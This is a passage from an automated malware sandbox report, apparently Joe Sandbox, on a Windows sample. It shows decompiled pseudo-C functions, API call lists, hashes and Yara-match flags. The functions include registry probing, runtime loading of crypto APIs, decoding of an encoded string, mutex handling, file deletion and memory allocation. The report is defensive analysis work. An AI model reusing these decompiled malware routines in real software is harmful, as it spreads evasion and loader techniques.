                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                              • API String ID: 4004864024-597752486
                                                                              • Opcode ID: a5b2d7178a0d74abec4258be8a62055373884c13397991c79847c81a81a4471c
                                                                              • Instruction ID: 3b5f070e76ef6d1bd0a9a0da8e866c539bf35f3abd7e40ae7ba4e1952652faae
                                                                              • Opcode Fuzzy Hash: a5b2d7178a0d74abec4258be8a62055373884c13397991c79847c81a81a4471c
                                                                              • Instruction Fuzzy Hash: 40016DB0B143208FEB20EF66E909A1A3BA8AF44745F45449FF54497362DB78D844CB6A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C51F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1257 42c51f-42c54d 1258 42c553 1257->1258 1259 42c5db-42c5e8 RegCloseKey 1257->1259 1260 42c554-42c56a RegOpenKeyExA 1258->1260 1261 42c5c3-42c5d4 RegCloseKey 1260->1261 1262 42c56c-42c56f 1260->1262 1261->1260 1264 42c5da 1261->1264 1263 42c5bd-42c5c1 1262->1263 1263->1261 1265 42c571-42c58a RegQueryValueExA 1263->1265 1264->1259 1266 42c58c-42c590 1265->1266 1267 42c5ad-42c5ba 1265->1267 1266->1267 1268 42c592-42c59b 1266->1268 1267->1263 1269 42c5a5-42c5a7 1268->1269 1270 42c59d-42c5a3 1268->1270 1269->1267 1270->1267
                                                                              C-Code - Quality: 100%
                                                                              			E0042C51F(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t30;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x456168; // 0x449294
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x456168;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					_t30 = RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8); // executed
					if(_t30 != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x456130
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}















                                                                              0x0042c529
                                                                              0x0042c52f
                                                                              0x0042c535
                                                                              0x0042c538
                                                                              0x0042c53b
                                                                              0x0042c53e
                                                                              0x0042c545
                                                                              0x0042c548
                                                                              0x0042c54d
                                                                              0x0042c5db
                                                                              0x0042c5dc
                                                                              0x0042c5e8
                                                                              0x0042c5e8
                                                                              0x0042c554
                                                                              0x0042c562
                                                                              0x0042c56a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c56c
                                                                              0x0042c56c
                                                                              0x0042c5bd
                                                                              0x0042c5bd
                                                                              0x0042c5c1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c58a
                                                                              0x0042c595
                                                                              0x0042c598
                                                                              0x0042c598
                                                                              0x0042c59b
                                                                              0x0042c5a7
                                                                              0x0042c59d
                                                                              0x0042c59d
                                                                              0x0042c59d
                                                                              0x0042c59b
                                                                              0x0042c5ad
                                                                              0x0042c5b0
                                                                              0x0042c5b7
                                                                              0x0042c5ba
                                                                              0x0042c5ba
                                                                              0x0042c5c3
                                                                              0x0042c5c6
                                                                              0x0042c5cc
                                                                              0x0042c5d1
                                                                              0x0042c5d1
                                                                              0x00000000

                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00456168,00000000,00000001,?), ref: 0042C562
                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0042C582
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042C5C6
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0042C5DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Close$OpenQueryValue
                                                                              • String ID: haE
                                                                              • API String ID: 1607946009-3285560435
                                                                              • Opcode ID: cf59c28b544082afeb2c52bfffa1c3c201993419a19452b0c09b9db3eddc0a44
                                                                              • Instruction ID: 8d60ae65d3de2ec173cb7bffc614e31779142a128116d219209176ffc86a8800
                                                                              • Opcode Fuzzy Hash: cf59c28b544082afeb2c52bfffa1c3c201993419a19452b0c09b9db3eddc0a44
                                                                              • Instruction Fuzzy Hash: A72141B1E00224FFEF14CF96DD85AAEBBB8EF50305F50406BE505A6211D774AA44CF25
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222DC86, Relevance: 7.6, APIs: 5, Instructions: 71fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0222DB28: lstrlenW.KERNEL32(00000000,?,00000000), ref: 0222DB39
                                                                              • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?,?,00000102), ref: 0222DCD4
                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000102), ref: 0222DCDF
                                                                              • _snwprintf.NTDLL ref: 0222DD04
                                                                              • _snwprintf.NTDLL ref: 0222DD39
                                                                              • DeleteFileW.KERNELBASE(?), ref: 0222DD50
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FolderPath_snwprintf$DeleteFilelstrlen
                                                                              • String ID:
                                                                              • API String ID: 1341198303-0
                                                                              • Opcode ID: 6695e55b8af59a357685bb5b106c27593875b4643ba6b9f88371b8dd06410094
                                                                              • Instruction ID: c94b02a4f367bab287d337e1f8fc16c337622188712a6c4c9ed3f8239b255d7d
                                                                              • Opcode Fuzzy Hash: 6695e55b8af59a357685bb5b106c27593875b4643ba6b9f88371b8dd06410094
                                                                              • Instruction Fuzzy Hash: 7811DDB2E1022CBFD710AAE4AC48DEF766EEB44305F0405A1E909D3145EE758E958FB4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222BA6F, Relevance: 7.5, APIs: 5, Instructions: 40synchronizationCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1288 222ba6f-222ba79 call 222b963 1291 222ba7b-222ba90 WaitForSingleObject 1288->1291 1292 222baec-222baef 1288->1292 1293 222ba92-222ba94 1291->1293 1294 222ba96 call 222b9bc 1291->1294 1293->1294 1295 222baeb 1293->1295 1297 222ba9b-222ba9d 1294->1297 1295->1292 1298 222bad3-222bae5 ReleaseMutex CloseHandle 1297->1298 1299 222ba9f-222baa6 call 222ba15 1297->1299 1298->1295 1299->1298 1302 222baa8-222babf SignalObjectAndWait 1299->1302 1303 222bac1-222bac3 1302->1303 1304 222bac5-222bad1 ResetEvent 1302->1304 1303->1298 1303->1304 1304->1298
                                                                              APIs
                                                                                • Part of subcall function 0222B963: _snwprintf.NTDLL ref: 0222B98B
                                                                                • Part of subcall function 0222B963: CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0222B9A3
                                                                              • WaitForSingleObject.KERNEL32(00000000,?,00000000,0222BCE5), ref: 0222BA83
                                                                              • SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,0222BCE5), ref: 0222BAB7
                                                                              • ResetEvent.KERNEL32(?,00000000,0222BCE5), ref: 0222BACB
                                                                              • ReleaseMutex.KERNEL32(?,00000000,0222BCE5), ref: 0222BAD9
                                                                              • CloseHandle.KERNEL32(?,00000000,0222BCE5), ref: 0222BAE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 2255288334-0
                                                                              • Opcode ID: 60b7f1872aa58a50f289a1ecebb8b383082531eb85faba48e70c76de19652bcb
                                                                              • Instruction ID: bdfce5a837a7a7f0c2e641a1df1da72b9aa8df6fc90db418b58ca0e78c27bf14
                                                                              • Opcode Fuzzy Hash: 60b7f1872aa58a50f289a1ecebb8b383082531eb85faba48e70c76de19652bcb
                                                                              • Instruction Fuzzy Hash: 9EF04435A54233B7DB215BE5FC0C75B3BA6EF443597184A20F804D0168DF26C879DA61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405F9A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1305 405f9a-405fb7 call 4128a0 call 40180a 1310 405fb9-406005 call 411a30 call 401784 call 403c31 1305->1310 1311 40600b-406038 call 408aaa call 407d75 call 424be6 1305->1311 1322 40600a 1310->1322 1324 406043-406061 call 401bce 1311->1324 1325 40603a-40603d SetFileSecurityW 1311->1325 1322->1311 1325->1324
                                                                              C-Code - Quality: 94%
                                                                              			E00405F9A(void* __ecx, void* __esi, void* __eflags) {
				void* _t16;
				signed char _t27;
				signed int _t28;
				void* _t31;
				void* _t43;
				void* _t51;

				E004128A0(E00430A04, _t51);
				_t31 = __ecx; // executed
				_t16 = E0040180A(__ecx); // executed
				if(_t16 == 0) {
					 *((intOrPtr*)(_t51 - 0x10)) = 0;
					 *((intOrPtr*)(_t51 - 0x14)) = 0;
					_t27 = E00401784(_t51 - 0x10, _t51 - 0x14, "emFkQUdjdmZiR1RkZnNYQ3ods", E00411A30("emFkQUdjdmZiR1RkZnNYQ3ods")); // executed
					_t28 = _t27 & 0x000000ff;
					 *0x4560d0 = 0x6802 - _t28;
					 *0x4560d4 = 0x1001 - _t28;
					_t43 = 0x41;
					 *0x4560d8 = 0x1001; // executed
					E00403C31(_t43 - _t28, 0x1001); // executed
				}
				E00408AAA(0);
				_push(0);
				E00407D75(_t51 - 0x140);
				 *(_t51 - 4) = 0;
				 *((intOrPtr*)(_t31 + 0x1c)) = _t51 - 0x140;
				if(E00424BE6(_t51 - 0x140) == 1) {
					SetFileSecurityW(0, 0, 0);
				}
				 *(_t51 - 4) =  *(_t51 - 4) | 0xffffffff;
				E00401BCE(_t51 - 0x140);
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return 0;
			}









                                                                              0x00405f9f
                                                                              0x00405fac
                                                                              0x00405fae
                                                                              0x00405fb7
                                                                              0x00405fc0
                                                                              0x00405fc3
                                                                              0x00405fd5
                                                                              0x00405fda
                                                                              0x00405fe4
                                                                              0x00405ff4
                                                                              0x00405ffc
                                                                              0x00405fff
                                                                              0x00406005
                                                                              0x0040600a
                                                                              0x0040600c
                                                                              0x00406012
                                                                              0x00406019
                                                                              0x0040602a
                                                                              0x0040602d
                                                                              0x00406038
                                                                              0x0040603d
                                                                              0x0040603d
                                                                              0x00406043
                                                                              0x0040604d
                                                                              0x00406059
                                                                              0x00406061

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00405F9F
                                                                                • Part of subcall function 0040180A: GetModuleHandleW.KERNEL32(ADVAPI32.DLL,CryptAcquireContextA), ref: 0040181A
                                                                                • Part of subcall function 0040180A: GetProcAddress.KERNEL32(00000000), ref: 00401821
                                                                              • _strlen.LIBCMT ref: 00405FC6
                                                                                • Part of subcall function 00403C31: __EH_prolog.LIBCMT ref: 00403C36
                                                                              • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040603D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$AddressFileHandleModuleProcSecurity_strlen
                                                                              • String ID: emFkQUdjdmZiR1RkZnNYQ3ods
                                                                              • API String ID: 353750186-3100813025
                                                                              • Opcode ID: 6f275b23a37ebe25d968691e7df69b9ca7760517390b081f732cbfa169a9fc78
                                                                              • Instruction ID: d0d7e402275523c15f562869e77d0675759ef40cad440e539a3049c9069d2aae
                                                                              • Opcode Fuzzy Hash: 6f275b23a37ebe25d968691e7df69b9ca7760517390b081f732cbfa169a9fc78
                                                                              • Instruction Fuzzy Hash: 7211B4B19002149ADB29EF66D945AEE7BB8EF84304F00017FE506E31D1DB7C9B41CA14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401784, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1328 401784-401790 1329 401792-401794 1328->1329 1330 401796-4017bd LoadLibraryW GetProcAddress 1328->1330 1331 401807-401809 1329->1331 1332 4017c2-4017c4 1330->1332 1333 4017c6-4017c8 1332->1333 1334 4017ca-4017dc call 412247 1332->1334 1335 401806 1333->1335 1338 4017e2-401802 call 412140 1334->1338 1339 4017de-4017e0 1334->1339 1335->1331 1340 401805 1338->1340 1339->1340 1340->1335
                                                                              C-Code - Quality: 20%
                                                                              			E00401784(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _v28;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				intOrPtr _t17;
				signed int _t20;
				intOrPtr* _t23;
				intOrPtr* _t30;

				if(_a12 != 0) {
					_t12 = LoadLibraryW(L"CRYPT32.DLL"); // executed
					_t13 = GetProcAddress(_t12, "CryptStringToBinaryA");
					_t30 = _a8;
					_push(0);
					_push(0);
					_push(_t30);
					_push(0);
					_push(1);
					_push(_a16);
					_v28 = _t13;
					_push(_a12);
					if( *_t13() != 0) {
						_t17 = E00412247( *_t30 + 1);
						_t23 = _a4;
						 *_t23 = _t17;
						if(_t17 != 0) {
							E00412140(_t17, 0,  *_t30 + 1);
							_t20 = _v28(_a12, _a16, 1,  *_t23, _t30, 0, 0) & 0xffffff00 | _t19 != 0x00000000;
						} else {
							_t20 = 0;
						}
					} else {
						_t20 = 0;
					}
					return _t20;
				}
				return 0;
			}










                                                                              0x00401790
                                                                              0x004017a1
                                                                              0x004017a8
                                                                              0x004017ae
                                                                              0x004017b1
                                                                              0x004017b2
                                                                              0x004017b3
                                                                              0x004017b4
                                                                              0x004017b5
                                                                              0x004017b7
                                                                              0x004017ba
                                                                              0x004017bd
                                                                              0x004017c4
                                                                              0x004017cf
                                                                              0x004017d6
                                                                              0x004017da
                                                                              0x004017dc
                                                                              0x004017e8
                                                                              0x00401802
                                                                              0x004017de
                                                                              0x004017de
                                                                              0x004017de
                                                                              0x004017c6
                                                                              0x004017c6
                                                                              0x004017c6
                                                                              0x00000000
                                                                              0x00401806
                                                                              0x00000000

                                                                              APIs
                                                                              • LoadLibraryW.KERNELBASE(CRYPT32.DLL,CryptStringToBinaryA), ref: 004017A1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004017A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: CRYPT32.DLL$CryptStringToBinaryA
                                                                              • API String ID: 2574300362-4003543915
                                                                              • Opcode ID: 7b46f1b4eebd1e785f7fa98b3352991651239896ca68e764a2b4fc20df8f1eb0
                                                                              • Instruction ID: 018b8b139ed1087dfaa6c6f20e5b9f664c90e221dd5b12edc80f544ef9103122
                                                                              • Opcode Fuzzy Hash: 7b46f1b4eebd1e785f7fa98b3352991651239896ca68e764a2b4fc20df8f1eb0
                                                                              • Instruction Fuzzy Hash: 51014571500245BBCF216F62DC8ADEB3FBCEF82711F10002AF900E31A0EAB98850DA75
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040180A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1344 40180a-40183b GetModuleHandleW GetProcAddress 1346 401841-40184a 1344->1346 1347 40183d-40183f 1344->1347 1349 40184d-40184f 1346->1349 1348 401852-401855 1347->1348 1349->1348
                                                                              C-Code - Quality: 37%
                                                                              			E0040180A(void* __ecx) {
				char _v8;
				_Unknown_base(*)()* _t7;
				void* _t9;
				signed int _t11;
				signed int _t12;
				void* _t14;
				_Unknown_base(*)()* _t15;
				void* _t17;

				_t7 = GetProcAddress(GetModuleHandleW(L"ADVAPI32.DLL"), "CryptAcquireContextA");
				_t15 = _t7;
				_v8 = 0;
				_t9 =  *_t15( &_v8, 0, 0, 1, 0, _t14, _t17, __ecx); // executed
				if(_t9 != 0) {
					_t11 =  *_t15( &_v8, 0, 0, 1, 8); // executed
					_t12 = _t11 & 0xffffff00 | _t11 != 0x00000000;
				} else {
					_t12 = 0;
				}
				return _t12;
			}











                                                                              0x00401821
                                                                              0x0040182d
                                                                              0x00401834
                                                                              0x00401837
                                                                              0x0040183b
                                                                              0x0040184b
                                                                              0x0040184f
                                                                              0x0040183d
                                                                              0x0040183d
                                                                              0x0040183d
                                                                              0x00401855

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ADVAPI32.DLL,CryptAcquireContextA), ref: 0040181A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401821
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: ADVAPI32.DLL$CryptAcquireContextA
                                                                              • API String ID: 1646373207-987850268
                                                                              • Opcode ID: eecb9840068e36674a91a3f914a2579a2c994b1c6506360aa7c0764d2af295fc
                                                                              • Instruction ID: 9a4be1db1f9f4d6467f41e04a66d3d51ccf638422c920b1e6b222a5a67e9a983
                                                                              • Opcode Fuzzy Hash: eecb9840068e36674a91a3f914a2579a2c994b1c6506360aa7c0764d2af295fc
                                                                              • Instruction Fuzzy Hash: C9F0ECB3541324B6DA1067A55D0EFCB3B9CDF86B50F104031F501E2080D5F49B01D6B4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 021E002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?,?,021E0005), ref: 021E00EB
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,021E0005), ref: 021E0113
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, Offset: 021E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_21e0000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocInfoNativeSystemVirtual
                                                                              • String ID:
                                                                              • API String ID: 2032221330-0
                                                                              • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                              • Instruction ID: ade229c286394df92c67d96f6c683c45231cdb5c7c6974b62d0ce5d159c14420
                                                                              • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                              • Instruction Fuzzy Hash: D8E1C371648B068FDF24DF59CC8072AB7E1FF88318F08452DE896AB641E7B4E945CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221000, Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02221047
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0222105A
                                                                              • GetLastError.KERNEL32 ref: 02221064
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesCreateDirectoryErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 674977465-0
                                                                              • Opcode ID: 989e3ba4cf48ef87bf6474a50daf6d8e8c7831bf8f919694f46dffd8a6f0dbdd
                                                                              • Instruction ID: c8bc1fe15c5e9614cedb1901356b5139aedbe8d245348a21bd22b8dce2d2f475
                                                                              • Opcode Fuzzy Hash: 989e3ba4cf48ef87bf6474a50daf6d8e8c7831bf8f919694f46dffd8a6f0dbdd
                                                                              • Instruction Fuzzy Hash: FB014025C60325A6DB309AE4A80CAEB737CEF48310F400E55DC6DD209ADB7456AAC681
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222BCC2, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 0222BCCA
                                                                                • Part of subcall function 0222B901: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0222B916
                                                                                • Part of subcall function 0222B901: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,022326EC,00000000,00000000,00000000,00000000), ref: 0222B959
                                                                                • Part of subcall function 0222BA6F: WaitForSingleObject.KERNEL32(00000000,?,00000000,0222BCE5), ref: 0222BA83
                                                                                • Part of subcall function 0222BA6F: SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,0222BCE5), ref: 0222BAB7
                                                                                • Part of subcall function 0222BA6F: ResetEvent.KERNEL32(?,00000000,0222BCE5), ref: 0222BACB
                                                                                • Part of subcall function 0222BA6F: ReleaseMutex.KERNEL32(?,00000000,0222BCE5), ref: 0222BAD9
                                                                                • Part of subcall function 0222BA6F: CloseHandle.KERNEL32(?,00000000,0222BCE5), ref: 0222BAE5
                                                                              • WaitForSingleObject.KERNEL32(00001004), ref: 0222BCF6
                                                                              • WaitForSingleObject.KERNEL32(00000000), ref: 0222BD0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ObjectWait$Single$CloseCountDirectoryEventHandleInformationMutexReleaseResetSignalTickVolumeWindows
                                                                              • String ID:
                                                                              • API String ID: 1052563600-0
                                                                              • Opcode ID: 555b38180039aba3336240ada70b366c5098dceee6c32b500b49af013db91931
                                                                              • Instruction ID: a4fd572ba92bd02c714c10f8b56a09401173ff55541b585404af6c0fa0fda756
                                                                              • Opcode Fuzzy Hash: 555b38180039aba3336240ada70b366c5098dceee6c32b500b49af013db91931
                                                                              • Instruction Fuzzy Hash: 40E0A0349741256BD7106BE0BC0C6A6734EDB08319B108EA0B969C11A8DF665C24999A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004146EA, Relevance: 3.1, APIs: 2, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E004146EA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x44bd00);
				E00412BA4(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x45a59c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E00412BDF(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x45bc48 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x45bc44, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x45bc34; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E004148F8(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E004151BB();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E00414794();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E00412140(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E004154B7(_t31) != 0);
				goto L14;
			}









                                                                              0x004146ea
                                                                              0x004146ec
                                                                              0x004146f1
                                                                              0x004146f9
                                                                              0x004146fd
                                                                              0x00414702
                                                                              0x00414704
                                                                              0x00414704
                                                                              0x00414705
                                                                              0x00414705
                                                                              0x00414707
                                                                              0x0041470d
                                                                              0x00414774
                                                                              0x00414776
                                                                              0x0041479d
                                                                              0x0041479d
                                                                              0x0041479f
                                                                              0x004147a4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414776
                                                                              0x00414716
                                                                              0x0041475f
                                                                              0x00414761
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414763
